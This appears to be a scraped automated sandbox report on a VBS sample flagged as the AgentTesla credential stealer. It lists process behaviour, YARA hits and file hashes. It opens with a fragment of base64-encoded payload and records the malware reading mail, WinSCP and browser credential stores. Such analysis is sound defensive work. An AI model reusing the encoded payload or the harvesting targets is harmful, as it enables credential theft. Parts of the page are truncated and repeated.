//wQRBRzWKCkAAAoX2hMRHwo4Rv7//xYTEh8LODz+//84nwAAAAQRDh8M1ignAAAKExMfDDgj/v//BBEOHxDWKCcAAAoTFB8NOA/+//8EEQ4fFNYoJwAAChMVHw44+/3//xEULEsRFBfaF9aNGwAAARMWHw844/3//wQRFREWFhEWjmkoKgAACh8QOM39//8RBHsJAAAEEQ0RE9YRFhEWjmkSASgWAAAGLQZzJgAACnoRDh8o1hMOHxE4nv3//xESF9YTEhESERE+WP///xENKCsAAAoTDx8SOH/9//8RBHsJAAAEEQge1hEPGhIBKBYAAAYtBnMmAAAKegQRBR8o1ignAAAKExAfEzhO/f//EQwsBBEGEw0RBx8sEQ0RENaeHxQ4Nf3//ygoAAAKGjMWEQR7CgAABBEHKBMAAAYtHHMmAAAKehEEewoAAAQRBygUAAAGLQZzJgAACnoRBHsKAAAEKBkAAAYVMwZzJgAACnreSCgsAAAKFisBFkUDAAAAAgAAABQAAAAkAAAAKyoRBHsLAAAEhCgtAAAKExcXK9sRFywHERdvLgAAChYKGCvLKC8AAAoZK8PeAhcKBioAAABBHAAAAAAAAFsAAABeAwAAuQMAAEgAAAAYAAABHgIoEgAACiobMAQA7QAAAAMAABFzMAAACiUoMQAACm8yAAAKAigzAAAKKDQAAApypQAAcHKxAABwbzUAAApytQAAcHLDAABwbzUAAApyxwAAcHLTAABwbzUAAApy1wAAcHLjAABwbzUAAApy5wAAcHL5AABwbzUAAApy/QAAcHIPAQBwbzUAAApyEwEAcHIlAQBwbzUAAApyK			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_00F4F198 GetUserNameW,

3_2_00F4F198

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000003.00000002.822490552.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1236, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000003.00000002.822490552.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1236, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000003.00000002.822490552.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1236, type: MEMORYSTR

ID:	830445
Product:	CloudBasic
Start time:	11:38:14
Start date:	20.03.2023
Sample:	GJ890-1286.vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	b73f50ff5bacd275282b43778180fd8e
SHA1:	98d820b8a51989b2bf9e9982de31eccf47a54fba
SHA256:	2dbfb717c5e54b04e5e174bc6e62f90c1609adeb52085a9d42184aadac74bf0f
Filetype:	Text - UTF-16 (LE) encoded (2002/1) 64.44%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	13AF6BE1CB30E2FB779EA728EE0A6D67	F33581AC2C60B1F02C978D14DC220DCE57CC9562	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilbo13zy.j2f.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xv2hgkd3.00w.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B

Windows Analysis Report
GJ890-1286.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report GJ890-1286.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
GJ890-1286.vbs